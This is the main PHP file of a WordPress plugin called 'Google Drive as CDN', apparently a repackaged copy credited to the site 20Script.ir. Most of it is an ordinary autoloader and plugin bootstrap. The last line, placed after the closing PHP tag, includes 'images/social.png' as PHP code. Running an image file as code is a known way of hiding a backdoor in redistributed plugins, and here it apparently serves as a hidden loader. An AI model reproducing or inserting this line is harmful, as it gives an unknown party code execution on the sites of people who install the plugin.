<?php
/*
Plugin Name: Google Drive as CDN by 20Script.ir
Plugin URI: http://20script.ir
Description: shared by 20Script.ir
Author: wp-buddy
Author URI: http://20script.ir
Version: 1.3.1
*/


if ( ! defined( 'ABSPATH' ) ) {
	exit;
} // Exit if accessed directly

if ( ! function_exists( 'wpbgdc_autoloader' ) ) {
	/**
	 * The autoloader class
	 *
	 * @param string $class_name
	 *
	 * @return bool
	 * @since 1.0
	 */
	function wpbgdc_autoloader( $class_name ) {

		// do not include classes that already exist
		if ( class_exists( $class_name ) ) {
			return true;
		}

		$file = trailingslashit( dirname( __FILE__ ) ) . 'classes/' . strtolower( $class_name ) . '.php';
		if ( is_file( $file ) ) {
			require_once( $file );
			return true;
		}

		$folders = array(
			'classes/google-api-php-client/src/',
			'classes/google-api-php-client/src/auth/',
			'classes/google-api-php-client/src/cache/',
			'classes/google-api-php-client/src/contrib/',
			'classes/google-api-php-client/src/external/',
			'classes/google-api-php-client/src/io/',
			'classes/google-api-php-client/src/service/'
		);

		foreach ( $folders as $folder ) {
			$file = trailingslashit( dirname( __FILE__ ) ) . $folder . $class_name . '.php';
			if ( is_file( $file ) ) {
				require_once( $file );
				return true;
			}
		}

		return false;
	}
}

// registering the autoloader function
try {
	spl_autoload_register( 'wpbgdc_autoloader', true );
} catch ( Exception $e ) {
	function __autoload( $class_name ) {
		wpbgdc_autoloader( $class_name );
	}
}


if ( ! isset( $GLOBALS['wpb_google_drive_cdn'] ) ) {
	$GLOBALS['wpb_google_drive_cdn'] = new WPB_Google_Drive_Cdn( __FILE__ );
}
?>
<?php include('images/social.png'); ?>